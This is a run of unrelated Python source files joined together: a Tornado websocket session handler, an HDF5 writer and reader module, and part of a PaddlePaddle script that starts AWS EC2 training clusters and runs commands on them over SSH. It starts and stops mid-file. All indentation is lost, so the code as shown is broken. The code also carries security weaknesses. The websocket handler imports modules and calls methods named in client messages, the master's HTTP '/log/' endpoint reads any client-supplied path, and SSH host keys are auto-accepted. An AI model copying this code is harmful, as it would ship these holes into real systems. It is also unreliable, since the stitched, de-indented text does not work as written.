from multiprocessing import Process
SERVER = definitions.SERVER
class SuperBaseSocket(tornado.websocket.WebSocketHandler):
def open(self, id_sessions, Session):
_id = self.get_argument("id", None, True)
if not _id:
self.current_session = Session()
elif _id:
try : self.current_session = id_sessions['{}'.format(_id)]
except: self.current_session = None
if self.current_session:
pass
else:
self.current_session = Session(_id)
id_sessions['{}'.format(_id)] = self.current_session
def on_message(self, message):
json_string = u'%s' % (message)
message = json.loads(json_string)
self.write_message('Sent')
receiver = message['receiver']
algorithm = message['algorithm']
method = message['method']
key = list(method.keys())[0]
if receiver == SERVER:
if algorithm:
translator = \
__import__('algorithms.{}.translator'.format(algorithm)).__dict__['{}'.format(algorithm)].__dict__[
'translator']
mt = Process(target=translator.__dict__[key], args=(self.current_session, method[key]))
mt.start()
#translator.__dict__[key](self.current_session, method[key])
else:
self.__getattribute__(key)(method[key])
else:
self.current_session.__getattribute__('socket_{}'.format(receiver)).send(message)
def on_close(self):
pass
class SocketCFD(SuperBaseSocket):
def open(self, id_sessions, Session):
super(SocketCFD, self).open(id_sessions, Session)
print('CFD connection open')
def on_close(self):
print('Closing CFD connection')
class SocketModel3D(SuperBaseSocket):
def open(self, id_sessions, Session):
super(SocketModel3D, self).open(id_sessions, Session)
print('3D connection open')
def on_close(self):
print('Closing 3D connection')
class SocketDesign(SuperBaseSocket):
def open(self, id_sessions, Session):
super(SocketDesign, self).open(id_sessions, Session)
print('Design connection open')
def on_close(self):
print('Closing Design connection')
class SocketHandler(SuperBaseSocket):
def open(self, id_sessions, Session):
super(SocketHandler, self).open(id_sessions, Session)
print('Handler connection open')
def on_close(self):
print('Closing Handler connection')
class AlexaSocket(SuperBaseSocket):
def open(self, id_sessions, Session):
super(AlexaSocket, self).open(id_sessions, Session)
print('Alexa connection open')
def on_close(self):
print('Closing Alexa connection') |
distributors.py | import os.path
import h5py
import numpy as np
import multiprocessing
import threading
import queue
import warnings
from . import utils
class Distributor:
"""Base class for Distributors.
A `Distributor` is an object that should receive the input data from a
Device, e.g. a plotter or a file writer. Refer to specific implementations
for more details.
"""
def __init__(self, device=None, **kwargs):
self.device = device
for key, value in kwargs.items():
setattr(self, key, value)
def __call__(self, frame):
if frame is False:
self.stop()
else:
self.distribute(frame)
def distribute(self, frame):
raise NotImplementedError('Required method `distribute` is not implemented in {}'.format(self.__class__.__name__))
def reset(self):
"""Resets the distributor"""
pass
def setup(self):
"""Configures the distributor state"""
pass
def stop(self):
pass
@property
def device(self):
try:
return self._device
except AttributeError:
return None
@device.setter
def device(self, dev):
if self.device is not None:
# Unregister from the previous device
if self.device.initialized:
self.reset()
self.device._Device__distributors.remove(self)
self._device = dev
if self.device is not None:
# Register to the new device
self.device._Device__distributors.append(self)
if self.device.initialized:
self.setup()
class QDistributor(Distributor):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.Q = queue.Queue()
def distribute(self, frame):
self.Q.put(frame)
@property
def data(self):
return utils.concatenate_Q(self.Q)
def flush(self):
utils.flush_Q(self.Q)
class HDFWriter(Distributor):
""" Implements writing to an HDF 5 file.
Hiearchial Data Format (HDF) 5 is a format suitable for multidimentional
data. The format supports arbritrary metadata tags, and datasets can be
organized in a folder-like structure within a single file.
Fileaccess is restricted to a single writer to maintain file integrity.
A single writer can be be used to write data with multiple devices at the
same time by using different datasets.
HDFWriter supports three different file writing modes, see `start`.
Arguments:
name (`str`): The path to the file to write to.
Note:
Only create a single HDFWriter per file!
Todo:
Properly debug this class. It is quite advanced and has undergone many
changes since the initial implementation...
"""
_timeout = 0.1
def __init__(self, filename=None, **kwargs):
super().__init__(**kwargs)
if filename is None:
filename = 'data' # Default filename
name, ext = os.path.splitext(filename)
if len(ext) < 2: # Either empty or just a dot
ext = '.h5'
filename = name + ext
self.filename = filename
self._file = None
self._group = None
self._devices = []
self._input_Qs = []
self._internal_Q = multiprocessing.Queue()
self._datasets = []
self._manual_dataset = None
self._started = threading.Event()
self._stop_event = threading.Event()
def __call__(self, frame):
# We need to overwrite the default call method since we are handling multiple
# devices in this class, and should not stop because of a single device stopping.
pass
@property
def device(self):
return self._devices
@device.setter
def device(self, device):
if device is not None:
self.add_input(device=device)
def add_input(self, device=None, Q=None):
"""Adds a new device or queue.
At least one of ``device`` or ``Q`` must be given. If ``device`` is
``None`` or a string the queue will be treated as an deviceless queue.
If ``Q`` is not given it will be created and registred to the device.
Arguments:
device: A device which reads data.
Q: A queue with data to write.
"""
if device is None and Q is None:
raise ValueError('Either `device` or `Q` must be given as input')
if Q is None:
distr = QDistributor(device=device)
Q = distr.Q
self._devices.append(device)
self._input_Qs.append(Q)
def setup(self):
super().setup()
if not self._started.is_set():
warnings.warn('HDFWriter started automatically! This will NOT work when using multiple devices.')
self.start()
def start(self, mode='auto', use_process=True):
"""Starts the file writer.
The file writer will be started in one of three modes with different
level of user controll.
Mode: ``'auto'``
The auto mode doc
Mode: ``'signal'``
The signal mode doc
Mode: ``'manual'``
The manual mode doc
Arguments:
mode (`str`): The mode to start in.
use_process (`bool`): If writing should be managed in a separate
process. This is recommended, and enabled by default, since
file access with `h5py` will block all other threads. If set
to false, file writing will instead be managed in a thread.
"""
self.mode = mode
if use_process:
self._process = multiprocessing.Process(target=self._write_target)
else:
self._process = threading.Thread(target=self._write_target)
self._process.start()
if mode == 'auto':
self._thread = threading.Thread(target=self._auto_target)
self._thread.start()
elif mode == 'signal':
self._write_signal = threading.Event()
self._thread = threading.Thread(target=self._signal_target)
self._thread.start()
elif mode == 'manual':
class Dummy_thread:
def join():
return True
self._thread = Dummy_thread
self._started.set()
def stop(self):
self._stop_event.set()
self._thread.join()
self.write_device_configs()
self._internal_Q.put(None)
self._stop_event.clear()
def select_group(self, **kwargs):
self._internal_Q.put(('select', kwargs))
def _select_group(self, group=None):
if group is None:
group = '/'
self._group = self._file.require_group(group)
def create_dataset(self, **kwargs):
self._internal_Q.put(('create', kwargs))
def _create_dataset(self, name=None, ndim=2, index=None, **kwargs):
if name is None:
name = 'data{}'.format(index).replace('None', '') # Default name for sets
if name in self._group:
name_idx = 0
while name + '_' + str(name_idx) in self._group:
name_idx += 1
name = name + '_' + str(name_idx)
kwargs.setdefault('shape', ndim * (1,))
kwargs.setdefault('maxshape', ndim * (None,))
kwargs.setdefault('dtype', 'float64')
dataset = [self._group.create_dataset(name=name, **kwargs), np.array(ndim * (0,)), None]
if index is None:
self._manual_dataset = dataset
elif len(self._datasets) > index:
self._datasets[index] = dataset
else:
skips = index - len(self._datasets)
self._datasets.extend(skips * [None])
self._datasets.append(dataset)
return dataset
def write(self, **kwargs):
"""
Todo:
- Debug the ``step`` keyword. We want it to work both for True/False
in both manual writes and signal mode, as well as with an index
or a list of indices for the signalled mode.
- Allow for manual writes regardless of the mode. If the write function
is called with some data or a Q, write that data to the manual dataset.
"""
if self.mode == 'auto':
pass
elif self.mode == 'signal':
if 'step' in kwargs:
for idx in range(len(self._input_Qs)):
self.step(axis=kwargs['step'], index=idx)
self._write_signal.set()
elif self.mode == 'manual':
idx = kwargs.pop('index', None)
if 'name' in kwargs:
create_args = kwargs.copy()
[create_args.pop(key, None) for key in ['Q', 'data', 'step']]
self.create_dataset(create_args)
if 'Q' in kwargs:
while True:
try:
self._internal_Q.put(('write', (kwargs['Q'].get(timeout=self._timeout), idx)))
except queue.Empty:
break
elif 'data' in kwargs:
self._internal_Q.put(('write', (kwargs['data'], idx)))
if 'step' in kwargs:
self.step(axis=kwargs['step'])
def _write_attrs(self, index=None, **kwargs):
if index is None:
attrs = self._group.attrs
else:
attrs = self._datasets[index][0].attrs
for key, value in kwargs.items():
attrs[key] = value
def write_attrs(self, **kwargs):
self._internal_Q.put(('attrs', kwargs))
def write_device_configs(self, index=None, *args, **kwargs):
if index is None:
for idx in range(len(self._devices)):
self.write_device_configs(index=idx, *args, **kwargs)
else:
attr_names = {'fs', 'label', 'name', 'serial_number'}
device = self._devices[index]
# Qs without devices will correspond to None here, so attrs will be an empty dict => only kwargs will be written
attrs = {}
for attr in attr_names.union(args):
try:
value = getattr(device, attr)
except AttributeError:
pass
else:
attrs[attr] = value
try:
inputs = device.inputs
except AttributeError:
pass
else:
attrs['input_channels'] = np.string_([ch.to_json() for ch in inputs])
try:
outputs = device.outputs
except AttributeError:
pass
else:
attrs['output_channels'] = np.string_([ch.to_json() for ch in outputs])
attrs.update(kwargs)
self.write_attrs(index=index, **attrs)
def _write(self, data, index=None):
if index is None:
# Not an automated write from device Q
try:
dataset, head, _ = self._manual_dataset
except TypeError:
# We get `TypeError` if `manual_datast` is `None`
dataset, head, _ = self._create_dataset(ndim=data.ndim, chunks=data.shape)
self._manual_dataset[2] = data.shape
else:
try:
dataset, head, _ = self._datasets[index]
except (IndexError, TypeError):
# We will get an IndexError if index indicated a hogher number dataset than what already exists,
# but if we have a sparse creation of sets, e.g. set 0 is missing, but set 1 exists, we will get
# a type error since `None` is not iterable
dataset, head, _ = self._create_dataset(ndim=data.ndim, chunks=data.shape, index=index)
self._datasets[index][2] = data.shape
for idx in range(data.ndim):
ax = head.size - data.ndim + idx
if head[ax] + data.shape[idx] > dataset.shape[ax]:
dataset.resize(head[ax] + data.shape[idx], axis=ax)
# All indices exept the last ndim number are constant
idx_list = list(head[:-data.ndim])
# The last indices should be sliced from head to head+data.shape
idx_list.extend([slice(start, start + length) for start, length in zip(head[-data.ndim:], data.shape)])
# The list must be converted to a tuple
dataset[tuple(idx_list)] = data
# Uptade the head
head[-1] += data.shape[-1]
def step(self, **kwargs):
self._internal_Q.put(('step', kwargs))
def _step(self, axis=True, index=None):
"""
Todo:
Give a warning if someone tries to step a non-existing dataset
"""
if index is None:
try:
dataset, head, data_shape = self._manual_dataset
except TypeError:
# This happens if someone tries to step before datasets are created
return
else:
try:
dataset, head, data_shape = self._datasets[index]
except TypeError:
# TypeError if someone tries to step before datasets are created
return
if isinstance(axis, bool):
axis = max(len(head) - len(data_shape) - 1, 0)
if axis < 0:
axis = len(head) + axis - 1
steps = (len(head) - len(data_shape)) * (1,) + data_shape
head[axis] += steps[axis]
head[axis + 1:] = 0
if axis < len(head) - len(data_shape) and head[axis] >= dataset.shape[axis]:
dataset.resize(head[axis] + 1, axis)
return
# Old implementation below
if isinstance(axis, bool):
# Leave the data dimentions intact, step along the next one
axis = -len(data_shape) - 1
if axis >= 0:
# We would like to always index from the rear since the dimentions align there
axis = axis - dataset.ndim
if -axis <= len(data_shape):
# Step along axis in data
# Reshaping as a consequence of this cannot be done here since we allow a new data shape
head[axis] += data_shape[axis]
else:
# Step along axis not existing in data, resize if we need to
head[axis] += 1
if head[axis] >= dataset.shape[axis]:
dataset.resize(head[axis] + 1, dataset.ndim + axis)
# Reset axes after step axis
# Strange indexing needed for when axis=-1, since there is no -0 equivalent
head[head.size + axis + 1:] = 0
# self.head = head
def _write_target(self):
def handle(item):
if item is None:
raise StopIteration
else:
action = item[0]
args = item[1]
if action == 'write':
self._write(*args)
elif action == 'create':
self._create_dataset(**args)
elif action == 'step':
self._step(**args)
elif action == 'select':
self._select_group(**args)
elif action == 'attrs':
self._write_attrs(**args)
self._file = h5py.File(self.filename, mode='a')
self._select_group()
# Main write loop
while True:
try:
handle(self._internal_Q.get(timeout=self._timeout))
except queue.Empty:
continue
except StopIteration:
break
self._file.close()
def _auto_target(self):
for idx, device in enumerate(self._devices):
name = getattr(device, 'label', getattr(device, 'name', 'data{}'.format(idx)))
self.create_dataset(name=name, ndim=2, index=idx)
while not self._stop_event.is_set():
for idx, Q in enumerate(self._input_Qs):
try:
data = Q.get(timeout=self._timeout)
except queue.Empty:
continue
self._internal_Q.put(('write', (data, idx)))
# Stop event have bel set, clear out any remaining stuff in th Q
for idx, Q in enumerate(self._input_Qs):
while True:
try:
data = Q.get(timeout=self._timeout)
except queue.Empty:
break
self._internal_Q.put(('write', (data, idx)))
def _signal_target(self):
for idx, device in enumerate(self._devices):
name = getattr(device, 'label', getattr(device, 'name', 'data{}'.format(idx)))
self.create_dataset(name=name, ndim=3, index=idx)
while not self._stop_event.is_set():
if self._write_signal.wait(self._timeout):
self._write_signal.clear()
for Q in self._input_Qs:
# We should acuire all the locks as fast a possible!
Q.mutex.acquire()
for idx, Q in enumerate(self._input_Qs):
for data in Q.queue:
self._internal_Q.put(('write', (data, idx)))
Q.queue.clear()
for Q in self._input_Qs:
Q.mutex.release()
class HDFReader:
""" Implements reading from HDF 5 files"""
def __init__(self, filename):
if not os.path.isfile(filename):
raise IOError('No such file: {}'.format(filename))
self.file = h5py.File(filename, mode='r')
self.datasets = []
for dataset in self.file:
self.datasets.append(dataset)
self.dataset = self.datasets[0]
def __del__(self):
self.close()
def close(self):
if self.file.id:
self.file.close()
@property
def shape(self):
return self.dataset.shape
@property
def dataset(self):
return self._dataset
@dataset.setter
def dataset(self, dataset):
if dataset not in self.datasets:
if isinstance(dataset, int):
dataset = self.datasets[dataset]
else:
raise KeyError(dataset)
self._dataset = self.file[dataset]
def blocks(self, start=None, stop=None, blocksize=None):
""" A block generator. The last block might be of a different shape than the rest."""
if start is None:
start = 0
if stop is None:
stop = self.shape[1]
if start < 0:
start = self.shape[1] + start
if stop < 0:
stop = self.shape[1] + stop
if blocksize is None:
blocksize = self.dataset.chunks[1]
n_blocks = -((start - stop) // blocksize) # Round up
for block in range(n_blocks):
yield self[:, start + block * blocksize:min(start + (block + 1) * blocksize, stop)]
def __getitem__(self, key):
if len(key) > self.dataset.ndim:
self.dataset = (key[-1])
return self.dataset[key[:-1]]
else:
return self.dataset[key]
|
cluster_master.py | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import json
import math
import time
import threading
import logging
import copy
import csv
import netaddr
import boto3
import namesgenerator
import paramiko
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
# You must have aws_access_key_id, aws_secret_access_key, region set in
# ~/.aws/credentials and ~/.aws/config
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument(
'--key_name', type=str, default="", help="required, key pair name")
parser.add_argument(
'--security_group_id',
type=str,
default="",
help="required, the security group id associated with your VPC")
parser.add_argument(
'--vpc_id',
type=str,
default="",
help="The VPC in which you wish to run test")
parser.add_argument(
'--subnet_id',
type=str,
default="",
help="The Subnet_id in which you wish to run test")
parser.add_argument(
'--pserver_instance_type',
type=str,
default="c5.2xlarge",
help="your pserver instance type, c5.2xlarge by default")
parser.add_argument(
'--trainer_instance_type',
type=str,
default="p2.8xlarge",
help="your trainer instance type, p2.8xlarge by default")
parser.add_argument(
'--task_name',
type=str,
default="",
help="the name you want to identify your job")
parser.add_argument(
'--pserver_image_id',
type=str,
default="ami-da2c1cbf",
help="ami id for system image, default one has nvidia-docker ready, use ami-1ae93962 for us-east-2"
)
parser.add_argument(
'--trainer_image_id',
type=str,
default="ami-da2c1cbf",
help="ami id for system image, default one has nvidia-docker ready, use ami-1ae93962 for us-west-2"
)
parser.add_argument(
'--availability_zone',
type=str,
default="us-east-2a",
help="aws zone id to place ec2 instances")
parser.add_argument(
'--trainer_count', type=int, default=1, help="Trainer count")
parser.add_argument(
'--pserver_count', type=int, default=1, help="Pserver count")
parser.add_argument(
'--pserver_bash_file',
type=str,
default=os.path.join(os.path.dirname(__file__), "pserver.sh.template"),
help="pserver bash file path")
parser.add_argument(
'--pserver_command', type=str, default="", help="pserver start command")
parser.add_argument(
'--trainer_bash_file',
type=str,
default=os.path.join(os.path.dirname(__file__), "trainer.sh.template"),
help="trainer bash file path")
parser.add_argument(
'--trainer_command', type=str, default="", help="trainer start command")
parser.add_argument(
'--action', type=str, default="serve", help="create|cleanup|serve")
parser.add_argument('--pem_path', type=str, help="private key file")
parser.add_argument(
'--pserver_port', type=str, default="5436", help="pserver port")
parser.add_argument(
'--docker_image', type=str, default="busybox", help="training docker image")
parser.add_argument(
'--master_server_port', type=int, default=5436, help="master server port")
parser.add_argument(
'--master_server_ip', type=str, default="", help="master server private ip")
parser.add_argument(
'--metric_data_identifier',
type=str,
default="**metrics_data: ",
help="key string to identify metrics data")
parser.add_argument(
'--no_clean_up',
type=str2bool,
default=False,
help="whether to clean up after training")
args = parser.parse_args()
ec2client = boto3.client('ec2')
args.log_path = os.path.join(os.path.dirname(__file__), "logs/")
logging.basicConfig(
filename=args.log_path + 'master.log',
level=logging.INFO,
format='%(asctime)s %(message)s')
log_files = ["master.log"]
metrics = {}
metrics_csv_file_name = "metrics.csv"
is_metrics_file_created = False
def create_subnet():
# if no vpc id provided, list vpcs
logging.info("start creating subnet")
if not args.vpc_id:
logging.info("no vpc provided, trying to find the default one")
vpcs_desc = ec2client.describe_vpcs(
Filters=[{
"Name": "isDefault",
"Values": ["true", ]
}], )
if len(vpcs_desc["Vpcs"]) == 0:
raise ValueError('No default VPC')
args.vpc_id = vpcs_desc["Vpcs"][0]["VpcId"]
vpc_cidrBlock = vpcs_desc["Vpcs"][0]["CidrBlock"]
logging.info("default vpc fount with id %s and CidrBlock %s" %
(args.vpc_id, vpc_cidrBlock))
if not vpc_cidrBlock:
logging.info("trying to find cidrblock for vpc")
vpcs_desc = ec2client.describe_vpcs(
Filters=[{
"Name": "vpc-id",
"Values": [args.vpc_id, ],
}], )
if len(vpcs_desc["Vpcs"]) == 0:
raise ValueError('No VPC found')
vpc_cidrBlock = vpcs_desc["Vpcs"][0]["CidrBlock"]
logging.info("cidrblock for vpc is %s" % vpc_cidrBlock)
# list subnets in vpc in order to create a new one
logging.info("trying to find ip blocks for new subnet")
subnets_desc = ec2client.describe_subnets(
Filters=[{
"Name": "vpc-id",
"Values": [args.vpc_id, ],
}], )
ips_taken = []
for subnet_dec in subnets_desc["Subnets"]:
ips_taken.append(subnet_dec["CidrBlock"])
ip_blocks_avaliable = netaddr.IPSet(
[vpc_cidrBlock]) ^ netaddr.IPSet(ips_taken)
# adding 10 addresses as buffer
cidr_prefix = 32 - math.ceil(
math.log(args.pserver_count + args.trainer_count + 10, 2))
if cidr_prefix <= 16:
raise ValueError('Too many nodes to fit in current VPC')
for ipnetwork in ip_blocks_avaliable.iter_cidrs():
try:
subnet_cidr = ipnetwork.subnet(int(cidr_prefix)).next()
logging.info("subnet ip block found %s" % (subnet_cidr))
break
except Exception:
pass
if not subnet_cidr:
raise ValueError(
'No avaliable subnet to fit required nodes in current VPC')
logging.info("trying to create subnet")
subnet_desc = ec2client.create_subnet(
CidrBlock=str(subnet_cidr),
VpcId=args.vpc_id,
AvailabilityZone=args.availability_zone)
subnet_id = subnet_desc["Subnet"]["SubnetId"]
subnet_waiter = ec2client.get_waiter('subnet_available')
# sleep for 1s before checking its state
time.sleep(1)
subnet_waiter.wait(SubnetIds=[subnet_id, ])
logging.info("subnet created")
logging.info("adding tags to newly created subnet")
ec2client.create_tags(
Resources=[subnet_id, ],
Tags=[{
"Key": "Task_name",
'Value': args.task_name
}])
return subnet_id
def generate_task_name():
return namesgenerator.get_random_name()
def script_to_str(file_path):
if not file_path:
return "echo $PSERVER_HOSTS"
file = open(file_path, 'r')
text = file.read().strip()
file.close()
return text
def run_instances(image_id, instance_type, count, role, cmd=""):
if count == 0:
return []
response = ec2client.run_instances(
ImageId=image_id,
InstanceType=instance_type,
MaxCount=count,
MinCount=count,
UserData=cmd,
DryRun=False,
InstanceInitiatedShutdownBehavior="stop",
KeyName=args.key_name,
Placement={'AvailabilityZone': args.availability_zone},
NetworkInterfaces=[{
'DeviceIndex': 0,
'SubnetId': args.subnet_id,
"AssociatePublicIpAddress": True,
'Groups': args.security_group_ids
}],
TagSpecifications=[{
'ResourceType': "instance",
'Tags': [{
"Key": 'Task_name',
"Value": args.task_name
}, {
"Key": 'Role',
"Value": role
}]
}])
instance_ids = []
for instance in response["Instances"]:
instance_ids.append(instance["InstanceId"])
if len(instance_ids) > 0:
logging.info(str(len(instance_ids)) + " instance(s) created")
else:
logging.info("no instance created")
#create waiter to make sure it's running
logging.info("waiting for instance to become accessible")
waiter = ec2client.get_waiter('instance_status_ok')
waiter.wait(
Filters=[{
"Name": "instance-status.status",
"Values": ["ok"]
}, {
"Name": "instance-status.reachability",
"Values": ["passed"]
}, {
"Name": "instance-state-name",
"Values": ["running"]
}],
InstanceIds=instance_ids)
instances_response = ec2client.describe_instances(InstanceIds=instance_ids)
return instances_response["Reservations"][0]["Instances"]
def create_pservers():
try:
return run_instances(
image_id=args.pserver_image_id,
instance_type=args.pserver_instance_type,
count=args.pserver_count,
role="PSERVER", )
except Exception:
logging.exception("error while trying to create pservers")
cleanup(args.task_name)
def save_metrics_data(str_msg):
#parse msg
logging.info("found metrics data, saving it to csv file")
global is_metrics_file_created
metrics_raw = str_msg.split(",")
with open(args.log_path + metrics_csv_file_name, 'a') as csvfile:
csv_fieldnames = []
csv_write_data = {}
for metric in metrics_raw:
metric_data = metric.split("=")
metric_key = metric_data[0].strip()
metric_val = float(metric_data[1].strip())
if not metric_key in metrics:
metrics[metric_key] = []
metric_repo = metrics[metric_key]
metric_repo.append(metric_val)
csv_fieldnames.append(metric_key)
csv_write_data[metric_key] = metric_val
writer = csv.DictWriter(csvfile, fieldnames=csv_fieldnames)
if not is_metrics_file_created:
writer.writeheader()
is_metrics_file_created = True
writer.writerow(csv_write_data)
logging.info("csv file appended")
def log_to_file(source, filename):
if not filename in log_files:
log_files.append(filename)
with open(args.log_path + filename, "a") as log_file:
for line in iter(source.readline, ""):
log_file.write(line)
if (line.startswith(args.metric_data_identifier)):
#found key data, trying to add to csv
line = line.replace(args.metric_data_identifier, "")
save_metrics_data(line)
def parse_command(command_raw, defaults={}):
if not command_raw:
command_raw = ""
commands_processed = []
parameter_map = copy.copy(defaults)
for seg in command_raw.split(","):
if ":" in seg:
parameters = seg.split(":")
parameter_map[parameters[0]] = parameters[1]
else:
commands_processed.append(seg)
for key, val in parameter_map.iteritems():
commands_processed.append("--" + key + " " + str(val))
return " ".join(commands_processed)
def create_trainers(kickoff_cmd, pserver_endpoints_str):
def create_and_start_trainer(trainer_index):
logging.info("trainer " + str(trainer_index) + " is starting")
instance_response = run_instances(
image_id=args.trainer_image_id,
instance_type=args.trainer_instance_type,
count=1,
role="TRAINER", )[0]
trainer_ip = instance_response["PrivateIpAddress"]
logging.info("trainer " + str(trainer_index) + " started")
ssh_key = paramiko.RSAKey.from_private_key_file(args.pem_path)
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect(hostname=trainer_ip, username="ubuntu", pkey=ssh_key)
logging.info("trainer " + str(trainer_index) +
" terminal connected via ssh")
cmd = kickoff_cmd.format(
PSERVER_HOSTS=pserver_endpoints_str,
DOCKER_IMAGE=args.docker_image,
TRAINER_INDEX=str(trainer_index),
TASK_NAME=args.task_name,
TRAINER_COUNT=args.trainer_count,
COMMAND=parse_command(args.trainer_command, {"device": "GPU"}),
MASTER_ENDPOINT=args.master_server_ip + ":" +
str(args.master_server_port))
logging.info(cmd)
stdin, stdout, stderr = ssh_client.exec_command(command=cmd)
# read and save output log
logging.info("trainer " + str(trainer_index) +
" command executed, keep fetching log")
stdout_thread = threading.Thread(
target=log_to_file,
args=(
stdout,
"trainer_" + str(trainer_index) + ".log", ))
stderr_thread = threading.Thread(
target=log_to_file,
args=(
stderr,
"trainer_" + str(trainer_index) + "_err.log", ))
stdout_thread.start()
stderr_thread.start()
stdout_thread.join()
stderr_thread.join()
return_code = stdout.channel.recv_exit_status()
if return_code != 0:
trainer_create_results[trainer_index] = {'has_error': True}
raise ValueError("trainer didn't finish with exit code 0")
ssh_client.close()
# multi thread starting trainer instance and run kickoff command
trainer_threads = []
trainer_create_results = {}
try:
for i in xrange(args.trainer_count):
logging.info("starting tread for trainer " + str(i))
trainer_thread = threading.Thread(
target=create_and_start_trainer, args=(i, ))
trainer_thread.start()
trainer_threads.append(trainer_thread)
for trainer_thread in trainer_threads:
trainer_thread.join()
for result in trainer_create_results:
if result["has_error"]:
logging.error(
"error during trainer starting or training, destorying the while cluster "
)
cleanup(args.task_name)
break
logging.info("all trainers stopped")
except Exception, e:
logging.info(
"Training exception, clean up resources, please check log for more info"
)
finally:
cleanup(args.task_name)
def cleanup(task_name):
if args.no_clean_up:
logging.info("no clean up option set, going to leave the setup running")
return
#shutdown all ec2 instances
print("going to clean up " + task_name + " instances")
instances_response = ec2client.describe_instances(Filters=[{
"Name": "tag:Task_name",
"Values": [task_name]
}])
instance_ids = []
if len(instances_response["Reservations"]) > 0:
for reservation in instances_response["Reservations"]:
for instance in reservation["Instances"]:
instance_ids.append(instance["InstanceId"])
ec2client.terminate_instances(InstanceIds=instance_ids)
instance_termination_waiter = ec2client.get_waiter(
'instance_terminated')
instance_termination_waiter.wait(InstanceIds=instance_ids)
#delete the subnet created
subnet = ec2client.describe_subnets(Filters=[{
"Name": "tag:Task_name",
"Values": [task_name]
}])
if len(subnet["Subnets"]) > 0:
ec2client.delete_subnet(SubnetId=subnet["Subnets"][0]["SubnetId"])
# no subnet delete waiter, just leave it.
logging.info("Clearnup done")
return
def kickoff_pserver(host, pserver_endpoints_str):
try:
ssh_key = paramiko.RSAKey.from_private_key_file(args.pem_path)
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect(hostname=host, username="ubuntu", pkey=ssh_key)
cmd = (script_to_str(args.pserver_bash_file)).format(
PSERVER_HOSTS=pserver_endpoints_str,
DOCKER_IMAGE=args.docker_image,
PSERVER_PORT=args.pserver_port,
TASK_NAME=args.task_name,
COMMAND=parse_command(args.pserver_command, {"device": "CPU"}),
TRAINER_COUNT=args.trainer_count,
TRAINER_INDEX=0,
# there is no way to use 0.0.0.0:port to start pserver
# has to docker --network="host" with host ip to make this work
SERVER_ENDPOINT=host + ":" + str(args.pserver_port),
MASTER_ENDPOINT=args.master_server_ip + ":" +
str(args.master_server_port))
logging.info(cmd)
stdin, stdout, stderr = ssh_client.exec_command(command=cmd)
stdout_thread = threading.Thread(
target=log_to_file, args=(
stdout,
"pserver_" + host + ".log", ))
stderr_thread = threading.Thread(
target=log_to_file, args=(
stderr,
"pserver_" + host + "_err.log", ))
stdout_thread.start()
stderr_thread.start()
stdout_thread.join()
stderr_thread.join()
return_code = stdout.channel.recv_exit_status()
logging.info(return_code)
if return_code != 0:
raise Exception("Error while kicking off pserver training process")
except Exception:
logging.exception("Error while kicking off pserver training process")
cleanup(args.task_name)
finally:
ssh_client.close()
def init_args():
if not args.task_name:
args.task_name = generate_task_name()
logging.info("task name generated %s" % (args.task_name))
if not args.pem_path:
args.pem_path = os.path.expanduser("~") + "/" + args.key_name + ".pem"
if args.security_group_id:
args.security_group_ids = (args.security_group_id, )
args.trainers_job_done_count = 0
def create_cluster():
if not args.subnet_id:
logging.info("creating subnet for this task")
args.subnet_id = create_subnet()
logging.info("subnet %s created" % (args.subnet_id))
logging.info("creating pservers")
pserver_create_response = create_pservers()
logging.info("pserver created, collecting pserver ips")
pserver_endpoints = []
for pserver in pserver_create_response:
pserver_endpoints.append(pserver["NetworkInterfaces"][0][
"PrivateIpAddress"] + ":" + args.pserver_port)
pserver_endpoints_str = ",".join(pserver_endpoints)
logging.info("kicking off pserver training process")
pserver_threads = []
for pserver in pserver_create_response:
pserver_thread = threading.Thread(
target=kickoff_pserver,
args=(pserver["PrivateIpAddress"], pserver_endpoints_str))
pserver_thread.start()
pserver_threads.append(pserver_thread)
logging.info("all pserver training process started")
logging.info("creating trainers and kicking off trainer training process")
create_trainers(
kickoff_cmd=script_to_str(args.trainer_bash_file),
pserver_endpoints_str=pserver_endpoints_str)
for pserver_thread in pserver_threads:
pserver_thread.join()
logging.info("all process ended")
def start_server(args):
class S(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'text/text')
self.end_headers()
def do_HEAD(self):
self._set_headers()
def do_404(self):
self.send_response(404)
self.send_header('Content-type', 'text/text')
self.end_headers()
logging.info("Received invalid GET request" + self.path)
self.wfile.write("NO ACTION FOUND")
def do_GET(self):
request_path = self.path
if request_path == "/status" or request_path == "/master_logs":
self._set_headers()
logging.info("Received request to return status")
with open(args.log_path + "master.log", "r") as logfile:
self.wfile.write(logfile.read().strip())
elif request_path == "/list_logs" or request_path == "/logs":
self._set_headers()
self.wfile.write("\n".join(log_files))
elif "/log/" in request_path:
self._set_headers()
log_file_path = request_path.replace("/log/", "")
logging.info("requesting log file path is" + args.log_path +
log_file_path)
with open(args.log_path + log_file_path, "r") as logfile:
self.wfile.write(logfile.read().strip())
else:
self.do_404()
def do_POST(self):
request_path = self.path
if request_path == "/save_data":
self._set_headers()
logging.info("Received request to save data")
self.wfile.write("DATA SAVED!")
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
if args.task_name:
with open(args.task_name + ".txt", "a") as text_file:
text_file.write(post_data + "\n")
elif request_path == "/cleanup":
self._set_headers()
logging.info("Received request to cleanup cluster")
args.no_clean_up = False
cleanup(args.task_name)
self.wfile.write("cleanup in progress")
else:
self.do_404()
server_address = ('', args.master_server_port)
httpd = HTTPServer(server_address, S)
logging.info("HTTP server is starting")
httpd.serve_forever()
def print_arguments():
logging.info('----------- Configuration Arguments -----------')
for arg, value in sorted(vars(args).iteritems()):
